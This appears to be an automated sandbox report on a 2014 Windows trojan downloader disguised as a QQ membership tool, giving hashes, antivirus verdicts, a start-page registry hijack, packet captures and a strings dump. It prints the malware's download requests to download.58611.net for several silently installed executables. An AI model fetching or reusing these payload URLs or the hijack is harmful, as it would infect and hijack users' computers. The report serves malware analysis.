Analysis Date2014-11-07 02:57:42
MD50369302fa4ae4e996d1a372c32cf1b9b
SHA142ac0f77430c6afd1c65684663beee3da70d517f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 7a3366d03e8f81b7a01dfc8f127d3994 sha1: f329bc5d7a9f110b6dba5ae77845db8f80bf3d59 size: 520192
Section.rdata md5: a4819e23f6d4689adb17c517dacbe025 sha1: 382363113859599c08cf9adf2ee0d42399f7ce6f size: 77824
Section.data md5: cf4b85725fffc3de0d082b6688a876e7 sha1: 0a440225a24e5fb31935449456bab446ba1e85a6 size: 69632
Section.rsrc md5: 3a78bca202eee0c7172a58848b60b956 sha1: db572ffe292d8e1c34b48b920a5a5179a7195d04 size: 32768
Timestamp2014-09-05 01:47:20
VersionLegalCopyright: QQ会员获取器 版权所有
FileVersion: 1.0.0.0
CompanyName: QQ会员获取器
Comments: QQ会员获取器
ProductName: QQ会员获取器
ProductVersion: 1.0.0.0
FileDescription: QQ会员获取器
PackerMicrosoft Visual C++ v6.0
PEhash127d1e2048396ff2a2ce31193c5e523e6a0dc51d
IMPhash4eabfeaee765d4641117635c1aa8f41f
AV360 SafeGen:Variant.Graftor.951
AVAd-AwareGen:Variant.Graftor.951
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Agent.EW.gen!Eldorado
AVAvira (antivir)no_virus
AVBullGuardGen:Variant.Graftor.951
AVCA (E-Trust Ino)Win32/Oflwr.A!crypt
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Variant.Graftor.951
AVEset (nod32)Win32/TrojanDownloader.FlyStudio.AY
AVFortinetRiskware/Qhost
AVFrisk (f-prot)W32/Agent.EW.gen!Eldorado
AVF-SecureTrojan:W32/DelfInject.R
AVGrisoft (avg)Downloader.Generic14.DSH
AVIkarusno_virus
AVK7no_virus
AVKasperskyTrojan.Win32.StartPage
AVMalwareBytesno_virus
AVMcafeeRDN/Generic Downloader.x!lg
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Variant.Graftor.951
AVNormanGen:Variant.Graftor.951
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.hao186.net/?tn=6888\\x00
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates ProcessC:\Program Files\PPTV_forqd3036_06888.exe

Process
↳ C:\Program Files\PPTV_forqd3036_06888.exe

Network Details:

DNSdownload.58611.net
Type: A
218.241.29.215
HTTP GEThttp://download.58611.net:8181/QQBrowser/QQBrowser_silent_ruochen.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP GEThttp://download.58611.net:8181/qqPCTray_silent/qqpcmgr_silent_ruochen.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP GEThttp://download.58611.net:8181/pps/pps_silent_ruochen.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP GEThttp://download.58611.net:8181/uc/UCBrowser_silent_ruochen.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP GEThttp://download.58611.net:8181/baiduan/baiduan_silent_ruochen.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP GEThttp://download.58611.net:8181/baidusd/baidusd_silent_ruochen.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP GEThttp://download.58611.net:8181/sogouie/sogouie_silent_ruochen.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP GEThttp://download.58611.net:8181/pptv_silent/PPTV_forqd3036_06888.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP GEThttp://download.58611.net:8181/pptv_silent/PPTV_forqd3036_06888.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Flows TCP192.168.1.1:1031 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1032 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1033 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1034 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1035 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1036 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1037 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1038 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1039 ➝ 218.241.29.215:8181

Raw Pcap
0x00000000 (00000)   47455420 2f515142 726f7773 65722f51   GET /QQBrowser/Q
0x00000010 (00016)   5142726f 77736572 5f73696c 656e745f   QBrowser_silent_
0x00000020 (00032)   72756f63 68656e2e 65786520 48545450   ruochen.exe HTTP
0x00000030 (00048)   2f312e31 0d0a486f 73743a20 646f776e   /1.1..Host: down
0x00000040 (00064)   6c6f6164 2e353836 31312e6e 65743a38   load.58611.net:8
0x00000050 (00080)   3138310d 0a416363 6570743a 202a2f2a   181..Accept: */*
0x00000060 (00096)   0d0a5265 66657265 723a2068 7474703a   ..Referer: http:
0x00000070 (00112)   2f2f646f 776e6c6f 61642e35 38363131   //download.58611
0x00000080 (00128)   2e6e6574 3a383138 312f5151 42726f77   .net:8181/QQBrow
0x00000090 (00144)   7365720d 0a557365 722d4167 656e743a   ser..User-Agent:
0x000000a0 (00160)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000b0 (00176)   6d706174 69626c65 3b204d53 49452035   mpatible; MSIE 5
0x000000c0 (00192)   2e30303b 2057696e 646f7773 20393829   .00; Windows 98)
0x000000d0 (00208)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x000000e0 (00224)   68650d0a 43616368 652d436f 6e74726f   he..Cache-Contro
0x000000f0 (00240)   6c3a206e 6f2d6361 6368650d 0a436f6e   l: no-cache..Con
0x00000100 (00256)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000110 (00272)   0d0a                                  ..

0x00000000 (00000)   47455420 2f717150 43547261 795f7369   GET /qqPCTray_si
0x00000010 (00016)   6c656e74 2f717170 636d6772 5f73696c   lent/qqpcmgr_sil
0x00000020 (00032)   656e745f 72756f63 68656e2e 65786520   ent_ruochen.exe 
0x00000030 (00048)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000040 (00064)   646f776e 6c6f6164 2e353836 31312e6e   download.58611.n
0x00000050 (00080)   65743a38 3138310d 0a416363 6570743a   et:8181..Accept:
0x00000060 (00096)   202a2f2a 0d0a5265 66657265 723a2068    */*..Referer: h
0x00000070 (00112)   7474703a 2f2f646f 776e6c6f 61642e35   ttp://download.5
0x00000080 (00128)   38363131 2e6e6574 3a383138 312f7171   8611.net:8181/qq
0x00000090 (00144)   50435472 61795f73 696c656e 740d0a55   PCTray_silent..U
0x000000a0 (00160)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x000000b0 (00176)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x000000c0 (00192)   6c653b20 4d534945 20352e30 303b2057   le; MSIE 5.00; W
0x000000d0 (00208)   696e646f 77732039 38290d0a 50726167   indows 98)..Prag
0x000000e0 (00224)   6d613a20 6e6f2d63 61636865 0d0a4361   ma: no-cache..Ca
0x000000f0 (00240)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000100 (00256)   63616368 650d0a43 6f6e6e65 6374696f   cache..Connectio
0x00000110 (00272)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   47455420 2f707073 2f707073 5f73696c   GET /pps/pps_sil
0x00000010 (00016)   656e745f 72756f63 68656e2e 65786520   ent_ruochen.exe 
0x00000020 (00032)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000030 (00048)   646f776e 6c6f6164 2e353836 31312e6e   download.58611.n
0x00000040 (00064)   65743a38 3138310d 0a416363 6570743a   et:8181..Accept:
0x00000050 (00080)   202a2f2a 0d0a5265 66657265 723a2068    */*..Referer: h
0x00000060 (00096)   7474703a 2f2f646f 776e6c6f 61642e35   ttp://download.5
0x00000070 (00112)   38363131 2e6e6574 3a383138 312f7070   8611.net:8181/pp
0x00000080 (00128)   730d0a55 7365722d 4167656e 743a204d   s..User-Agent: M
0x00000090 (00144)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x000000a0 (00160)   61746962 6c653b20 4d534945 20352e30   atible; MSIE 5.0
0x000000b0 (00176)   303b2057 696e646f 77732039 38290d0a   0; Windows 98)..
0x000000c0 (00192)   50726167 6d613a20 6e6f2d63 61636865   Pragma: no-cache
0x000000d0 (00208)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000e0 (00224)   206e6f2d 63616368 650d0a43 6f6e6e65    no-cache..Conne
0x000000f0 (00240)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000100 (00256)   63616368 650d0a43 6f6e6e65 6374696f   cache..Connectio
0x00000110 (00272)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   47455420 2f75632f 55434272 6f777365   GET /uc/UCBrowse
0x00000010 (00016)   725f7369 6c656e74 5f72756f 6368656e   r_silent_ruochen
0x00000020 (00032)   2e657865 20485454 502f312e 310d0a48   .exe HTTP/1.1..H
0x00000030 (00048)   6f73743a 20646f77 6e6c6f61 642e3538   ost: download.58
0x00000040 (00064)   3631312e 6e65743a 38313831 0d0a4163   611.net:8181..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a52 65666572   cept: */*..Refer
0x00000060 (00096)   65723a20 68747470 3a2f2f64 6f776e6c   er: http://downl
0x00000070 (00112)   6f61642e 35383631 312e6e65 743a3831   oad.58611.net:81
0x00000080 (00128)   38312f75 630d0a55 7365722d 4167656e   81/uc..User-Agen
0x00000090 (00144)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x000000a0 (00160)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x000000b0 (00176)   20352e30 303b2057 696e646f 77732039    5.00; Windows 9
0x000000c0 (00192)   38290d0a 50726167 6d613a20 6e6f2d63   8)..Pragma: no-c
0x000000d0 (00208)   61636865 0d0a4361 6368652d 436f6e74   ache..Cache-Cont
0x000000e0 (00224)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x000000f0 (00240)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000100 (00256)   0d0a0d0a 650d0a43 6f6e6e65 6374696f   ....e..Connectio
0x00000110 (00272)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   47455420 2f626169 6475616e 2f626169   GET /baiduan/bai
0x00000010 (00016)   6475616e 5f73696c 656e745f 72756f63   duan_silent_ruoc
0x00000020 (00032)   68656e2e 65786520 48545450 2f312e31   hen.exe HTTP/1.1
0x00000030 (00048)   0d0a486f 73743a20 646f776e 6c6f6164   ..Host: download
0x00000040 (00064)   2e353836 31312e6e 65743a38 3138310d   .58611.net:8181.
0x00000050 (00080)   0a416363 6570743a 202a2f2a 0d0a5265   .Accept: */*..Re
0x00000060 (00096)   66657265 723a2068 7474703a 2f2f646f   ferer: http://do
0x00000070 (00112)   776e6c6f 61642e35 38363131 2e6e6574   wnload.58611.net
0x00000080 (00128)   3a383138 312f6261 69647561 6e0d0a55   :8181/baiduan..U
0x00000090 (00144)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x000000a0 (00160)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x000000b0 (00176)   6c653b20 4d534945 20352e30 303b2057   le; MSIE 5.00; W
0x000000c0 (00192)   696e646f 77732039 38290d0a 50726167   indows 98)..Prag
0x000000d0 (00208)   6d613a20 6e6f2d63 61636865 0d0a4361   ma: no-cache..Ca
0x000000e0 (00224)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000f0 (00240)   63616368 650d0a43 6f6e6e65 6374696f   cache..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 6374696f   n: close....ctio
0x00000110 (00272)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   47455420 2f626169 64757364 2f626169   GET /baidusd/bai
0x00000010 (00016)   64757364 5f73696c 656e745f 72756f63   dusd_silent_ruoc
0x00000020 (00032)   68656e2e 65786520 48545450 2f312e31   hen.exe HTTP/1.1
0x00000030 (00048)   0d0a486f 73743a20 646f776e 6c6f6164   ..Host: download
0x00000040 (00064)   2e353836 31312e6e 65743a38 3138310d   .58611.net:8181.
0x00000050 (00080)   0a416363 6570743a 202a2f2a 0d0a5265   .Accept: */*..Re
0x00000060 (00096)   66657265 723a2068 7474703a 2f2f646f   ferer: http://do
0x00000070 (00112)   776e6c6f 61642e35 38363131 2e6e6574   wnload.58611.net
0x00000080 (00128)   3a383138 312f6261 69647573 640d0a55   :8181/baidusd..U
0x00000090 (00144)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x000000a0 (00160)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x000000b0 (00176)   6c653b20 4d534945 20352e30 303b2057   le; MSIE 5.00; W
0x000000c0 (00192)   696e646f 77732039 38290d0a 50726167   indows 98)..Prag
0x000000d0 (00208)   6d613a20 6e6f2d63 61636865 0d0a4361   ma: no-cache..Ca
0x000000e0 (00224)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000f0 (00240)   63616368 650d0a43 6f6e6e65 6374696f   cache..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 6374696f   n: close....ctio
0x00000110 (00272)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   47455420 2f736f67 6f756965 2f736f67   GET /sogouie/sog
0x00000010 (00016)   6f756965 5f73696c 656e745f 72756f63   ouie_silent_ruoc
0x00000020 (00032)   68656e2e 65786520 48545450 2f312e31   hen.exe HTTP/1.1
0x00000030 (00048)   0d0a486f 73743a20 646f776e 6c6f6164   ..Host: download
0x00000040 (00064)   2e353836 31312e6e 65743a38 3138310d   .58611.net:8181.
0x00000050 (00080)   0a416363 6570743a 202a2f2a 0d0a5265   .Accept: */*..Re
0x00000060 (00096)   66657265 723a2068 7474703a 2f2f646f   ferer: http://do
0x00000070 (00112)   776e6c6f 61642e35 38363131 2e6e6574   wnload.58611.net
0x00000080 (00128)   3a383138 312f736f 676f7569 650d0a55   :8181/sogouie..U
0x00000090 (00144)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x000000a0 (00160)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x000000b0 (00176)   6c653b20 4d534945 20352e30 303b2057   le; MSIE 5.00; W
0x000000c0 (00192)   696e646f 77732039 38290d0a 50726167   indows 98)..Prag
0x000000d0 (00208)   6d613a20 6e6f2d63 61636865 0d0a4361   ma: no-cache..Ca
0x000000e0 (00224)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000f0 (00240)   63616368 650d0a43 6f6e6e65 6374696f   cache..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 6374696f   n: close....ctio
0x00000110 (00272)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   47455420 2f707074 765f7369 6c656e74   GET /pptv_silent
0x00000010 (00016)   2f505054 565f666f 72716433 3033365f   /PPTV_forqd3036_
0x00000020 (00032)   30363838 382e6578 65204854 54502f31   06888.exe HTTP/1
0x00000030 (00048)   2e310d0a 486f7374 3a20646f 776e6c6f   .1..Host: downlo
0x00000040 (00064)   61642e35 38363131 2e6e6574 3a383138   ad.58611.net:818
0x00000050 (00080)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000060 (00096)   52656665 7265723a 20687474 703a2f2f   Referer: http://
0x00000070 (00112)   646f776e 6c6f6164 2e353836 31312e6e   download.58611.n
0x00000080 (00128)   65743a38 3138312f 70707476 5f73696c   et:8181/pptv_sil
0x00000090 (00144)   656e740d 0a557365 722d4167 656e743a   ent..User-Agent:
0x000000a0 (00160)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000b0 (00176)   6d706174 69626c65 3b204d53 49452035   mpatible; MSIE 5
0x000000c0 (00192)   2e30303b 2057696e 646f7773 20393829   .00; Windows 98)
0x000000d0 (00208)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x000000e0 (00224)   68650d0a 43616368 652d436f 6e74726f   he..Cache-Contro
0x000000f0 (00240)   6c3a206e 6f2d6361 6368650d 0a436f6e   l: no-cache..Con
0x00000100 (00256)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000110 (00272)   0d0a2063 6c6f7365 0d0a0d0a            .. close....

0x00000000 (00000)   47455420 2f707074 765f7369 6c656e74   GET /pptv_silent
0x00000010 (00016)   2f505054 565f666f 72716433 3033365f   /PPTV_forqd3036_
0x00000020 (00032)   30363838 382e6578 65204854 54502f31   06888.exe HTTP/1
0x00000030 (00048)   2e310d0a 486f7374 3a20646f 776e6c6f   .1..Host: downlo
0x00000040 (00064)   61642e35 38363131 2e6e6574 3a383138   ad.58611.net:818
0x00000050 (00080)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000060 (00096)   52656665 7265723a 20687474 703a2f2f   Referer: http://
0x00000070 (00112)   646f776e 6c6f6164 2e353836 31312e6e   download.58611.n
0x00000080 (00128)   65743a38 3138312f 70707476 5f73696c   et:8181/pptv_sil
0x00000090 (00144)   656e740d 0a557365 722d4167 656e743a   ent..User-Agent:
0x000000a0 (00160)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000b0 (00176)   6d706174 69626c65 3b204d53 49452035   mpatible; MSIE 5
0x000000c0 (00192)   2e30303b 2057696e 646f7773 20393829   .00; Windows 98)
0x000000d0 (00208)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x000000e0 (00224)   68650d0a 43616368 652d436f 6e74726f   he..Cache-Contro
0x000000f0 (00240)   6c3a206e 6f2d6361 6368650d 0a436f6e   l: no-cache..Con
0x00000100 (00256)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000110 (00272)   0d0a2063 6c6f7365 0d0a0d0a            .. close....


Strings
....  ................
"#
....
.........
10/.-,+*)('&%$#"! ..............
.....
..........
..
.........
-
..
x
().
 
%
%
,,,
f
/
.
>?
-- \
.-E-0-0..
00-+ 
e
 
.00
...........?-  
0
0 
0
?
..G.  
u

    
 ......
 (*.*)
#####
#######
080404B0
 %1 
1.0.0.0
	1uM
(&C)
Comments
CompanyName
	Ctrl+
	Ctrl+D
	Ctrl+End
	Ctrl+G
	Ctrl+Home
	Ctrl+N
	Ctrl+PageDown
	Ctrl+PageUp
	&D.
DEFAULT_ICON
 DLL 
(&E)
FileDescription
FileVersion
         (((((                  H
(&H)
Hjjj
Hjjjj
Hjjjjjjjj
(&I)
 INI 
jjjj
jjjjjj
LegalCopyright
msctls_progress32
msctls_updown32
MS Shell Dlg
(&N)
(null)
(&O)
(&P)
	PageDown
	PageUp
ProductName
ProductVersion
Progress1
 %s 
(&S)
	Shift+Tab
Spin1
StringFileInfo
(&T)
	Tab/Enter
TEXTINCLUDE
Translation
VarFileInfo
VS_VERSION_INFO
xxxx
`]]&,"#
^,_^][
^]\,}}}
^$_^[]
 (*.*)|*.*||
!<<>>!
...   
	!	!	!	!	
0123456789abcdef
0123456789ABCDEF
01d0a8e3
(&07-034/)7 '
`^^08/.
<0|!<9
0dk:ghV
0R>\W[
,1"52.*
\\192.168.0.129\TCP\1037
1#QNAN
1#SNAN
	2	5	5	5	5	5
34(0x22), 
360Tray.exe
|?5^<@
5	!	!	!	!
	5	5	5
6;5 .J
	6	6	6	6
	6	6	6	6	6	6	6	6	6	6	,	,	,	,	,	,	,	,	+	+	+	+	+	/	/	/	'	'	'	'	'	'	'	'	'	'	(	(	(	(	(	(	(	(	(	(	(	(	(	
	7	7	7	7	7	7	7	7	7	7	7	*	*	-	-	-	-
80CF4A6B3E09425bA57935A3A0E4C473
|$89^Hu
89=HuK
?8:j}}}
8MThdu
\$8UVW
'9A`u"9
9D$$t+
9L$x~e
9l$xtU9
9nPu	9^T
9o4u'V
	9oTtc
9t$0v8
9|$$t6
_9=`uK
<9vK<-tG<_tC<.t?<:t;</t7
9^xu5j
a^_ }|}
<A|2<Z
A512548E76954B6E92C21055517615B0
a=Abstract:buffer;
a=ASMRuleBook:string;
a=Author:buffer;
abcddefghijklmnoopqrrsstuvvwwxyyz;
AB?J~~~
abnormal program termination
Accept: */*
Accept: application/sdp
Accept-Ranges: 
a=control:streamid=
a=Copyright:buffer;
AdjustWindowRectEx
Advapi32.dll
ADVAPI32.dll
a=Flags:integer;
AfxControlBar42s
AfxFrameOrView42s
AfxMDIFrame42s
AfxOldWndProc423
AfxOleControl42s
AfxWnd42s
Afx:%x:%x
Afx:%x:%x:%x:%x:%x
a=length:npt=
a=MaxBitRate:integer;
a=MaxPacketSize:integer;
a=mimetype:string;
anonymous
anonymous@123.com
a=OpaqueData:buffer;
AppendMenuA
a=Preroll:integer;
asf 2.0 header
a=StartTime:integer;
a=StreamCount:integer;
a=StreamName:string;
a=Title:buffer;
.?AUCThreadData@@
audio conceal none
audio media
audio spread
August
Author: %s
.?AV_AFX_BASE_MODULE_STATE@@
.?AV_AFX_CHECKLIST_STATE@@
.?AV_AFX_COLOR_STATE@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_THREAD_STATE@@
.?AV_AFX_WIN_STATE@@
.?AVCArchiveException@@
.?AVCBitmap@@
.?AVCBrush@@
.?AVCButton@@
.?AVCClientDC@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCColorDialog@@
.?AVCComboBox@@
.?AVCCommonDialog@@
.?AVCDC@@
.?AVCDialog@@
.?AVCDWordArray@@
.?AVCEdit@@
.?AVCException@@
.?AVCFile@@
.?AVCFileDialog@@
.?AVCFileException@@
.?AVCGdiObject@@
.?AVCHandleMap@@
.?AVCImageList@@
.?AVCListBox@@
.?AVCMapPtrToPtr@@
.?AVCMapStringToPtr@@
.?AVCMemFile@@
.?AVCMemoryException@@
.?AVCMenu@@
.?AVCNoTrackObject@@
.?AVCNotSupportedException@@
.?AVCObject@@
.?AVCPaintDC@@
.?AVCPen@@
.?AVCProgressCtrl@@
.?AVCPtrArray@@
.?AVCResourceException@@
.?AVCRgn@@
.?AVCSharedFile@@
.?AVCSimpleException@@
.?AVCStatic@@
.?AVCStringArray@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCTempImageList@@
.?AVCTempMenu@@
.?AVCTempWnd@@
.?AVCTestCmdUI@@
.?AVCToolTipCtrl@@
.?AVCUserException@@
.?AVCWinApp@@
.?AVCWindowDC@@
.?AVCWinThread@@
.?AVCWnd@@
.?AVCWordArray@@
.?AVtype_info@@
<A|@<Z
B 02CV
Bandwidth
Bandwidth: %u
bcdfghijklmnpqrstuvwxyz
BeginPaint
BeginPath
BitBlt
bitrate mutual exclusion
BKbhTb~XBK!;
 (*.BMP)|*.BMP|GIF
Bogus message code %d
btHHt.
BUTTON
C =02CVu
Cache-Control: no-cache
CallNextHookEx
CallWindowProcA
CArchiveException
CBitmap
CBrush
CButton
CClientDC
CCmdTarget
CColorDialog
CColourPicker
CComboBox
CDialog
CDWordArray
CException
CFileDialog
CFileException
CGdiObject
Challenge1: %s
CharUpperA
CheckMenuItem
ChildWindowFromPointEx
ChooseColorA
CImageList
ck(WSbpS
ClientChallenge: 9e26d33f2984236010ef6253fb1887f7
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
ClientToScreen
CListBox
CloseClipboard
CloseDatabase
CloseHandle
ClosePrinter
CLSIDFromString
CMapPtrToPtr
CMapStringToPtr
CMemFile
CMemoryException
CNotSupportedException
CObject
codec comment1 header
codec index >= number of codecs. %i %i
codec list
CombineRgn
combobox
COMCTL32.dll
COMCTL32.DLL
comdlg32.dll
command media
commctrl_DragListMsg
commdlg_ColorOK
commdlg_FileNameOK
commdlg_help
commdlg_LBSelChangedNotify
commdlg_SetRGBColor
commdlg_ShareViolation
CompanyID: KnKV4M4I/B2FjJ1TToLycw==
CompareStringA
CompareStringW
Connection: 
Connection: close
content description
Content-disposition: 
Content-Disposition: 
Content-length
Content-length: 
Content-Length: 
Content-range: 
Content-Range: 
Content-type: 
Content-Type: 
COOKIE
Cookie: %s
CopyAcceleratorTableA
CopyRect
Copyright: %s
CPaintDC
CPalette
C<PQWR
C:\Program Files\
CProgressCtrl
CPtrArray
CreateAcceleratorTableA
CreateBitmap
CreateCompatibleBitmap
CreateCompatibleDC
CreateDCA
CreateDialogIndirectParamA
CreateDIBitmap
CreateEllipticRgn
CreateEventA
CreateFileA
CreateFileMappingA
CreateFontIndirectA
CreateIconFromResource
CreateIconFromResourceEx
CreateMenu
CreatePalette
CreatePen
CreatePolygonRgn
CreatePopupMenu
CreateProcessA
CreateRectRgn
CreateRectRgnIndirect
CreateRoundRectRgn
CreateSemaphoreA
CreateSolidBrush
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
CResourceException
CSeq: 1
Cseq: %u
CSeq: %u
CSharedFile
CStatic
CStringArray
CTempDC
CTempGdiObject
CTempImageList
CTempMenu
CTempWnd
CToolTipCtrl
Ctrl+A
Ctrl+B
Ctrl+C
Ctrl+D
Ctrl+E
Ctrl+F
Ctrl+F1
Ctrl+F10
Ctrl+F11
Ctrl+F12
Ctrl+F2
Ctrl+F3
Ctrl+F4
Ctrl+F5
Ctrl+F6
Ctrl+F7
Ctrl+F8
Ctrl+F9
Ctrl+G
Ctrl+H
Ctrl+I
Ctrl+J
Ctrl+K
Ctrl+L
Ctrl+M
Ctrl+N
Ctrl+O
Ctrl+P
Ctrl+Q
Ctrl+R
Ctrl+S
Ctrl+Shift+F1
Ctrl+Shift+F10
Ctrl+Shift+F11
Ctrl+Shift+F12
Ctrl+Shift+F2
Ctrl+Shift+F3
Ctrl+Shift+F4
Ctrl+Shift+F5
Ctrl+Shift+F6
Ctrl+Shift+F7
Ctrl+Shift+F8
Ctrl+Shift+F9
Ctrl+T
Ctrl+U
Ctrl+V
Ctrl+W
Ctrl+X
Ctrl+Y
Ctrl+Z
 (*.CUR)|*.CUR|
CUserException
CWinApp
CWindowDC
CWinFormUnit
CWinThread
CWordArray
?? / %d]
D$ _^]
D$ _^][
D$,_^]
D$,;\$|
D$(_^]
D$(_^][
D$$_^[
D$$_^]
d09f2340818511d396f6aaf844c7e325
D$0PUVh
D$0vT2
D$0WPQ
D$ |2;
D$48uH
D$49D$$}
D$4p/H
D$4RPU
D$4t/H
D$4(uH
D$89Vdu
D$8p/H
D$8RPj
D$8t!j
D$<8uH
D$ 8uH
D$(8uH
D$$8uH
D$8VPQ
D$$~9+
@.data
D$(CUSWP
 %d/%d 
(%d-%d):
%d / %d
%d / %d]
dddd, MMMM dd, yyyy
D$dp/H
D$dPQV
D$dQUWRP
D$dSUVW
D$DSWRPQ
D$DURP
D$"EAB
December
DEFAULT_ICON
#define _AFX_NO_OLE_RESOURCES
#define _AFX_NO_PROPERTY_RESOURCES
#define _AFX_NO_TRACKER_RESOURCES
DefWindowProcA
DeleteCriticalSection
DeleteDC
DeleteMenu
DeleteObject
DESCRIBE
DestroyAcceleratorTable
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
device
devices
D$H_^][
D$|h4mI
D$ hH2I
D$hQRP
D$hRPQ
D$hSUV3
D$hUPQ
D$HUPQ
D$HUSj
DispatchMessageA
DISPLAY
D$(;l$ 
D$L8uH
DllRegisterServer
DllUnregisterServer
D$Lp/H
D$LPUj
D$Lt/H
D$LUSWP
DocumentPropertiesA
DOMAIN error
Download
D$,p/H
D$,Pj<j
D$ PQR
D$PQRP
D$PRPQ
DPtoLP
D,@,QE
D$(QPW
D$(QRP
D$ QSRPU
D$$QUP
DrawEdge
DrawFocusRect
DrawFrameControl
DrawIconEx
DrawTextA
D$@RPQj
D$(RPU
D$ RPUhD
D$(RPVU
D$,RVh<nI
|$DRWVU
%d, %s
D$,SPh
D$(SUV
D$$SUV
D$TRPW
D$TVPW
DuplicateHandle
D$@UPQ
|$D UV
D$,VPS
D$,WPS
D$(WPS
D$@WPS
D$xp/H
D$Xp/H
D$XPQU
D$XQRWP
;D$xt&
D$Xt/H
ech1Y%
E:\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
EHPWVS
Ellipse
EmptyClipboard
EnableMenuItem
EnableWindow
EndDialog
EndDoc
#endif
#endif //_WIN32
EndPage
EndPaint
EndPath
EnterCriticalSection
EnumDisplayMonitors
EnumDisplaySettingsA
eQpenc
EqualRect
error correction
Escape
ExcludeClipRect
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
ExitProcess
ExitThread
extended content description
extended content encryption
ExtSelectClipRgn
ExtTextOutA
F<_^][
F,_^][
F\_^][
F89^8u&j
F(9V8tQ
fbh(1'/
FD_ISSET 
FD@ul9L$(}f
FD uy9D$$}s
February
F(_+F$^[;E
?fff&ff23
F$@;F(v
F$@@;F(v
filename=
file properties
FileTimeToLocalFileTime
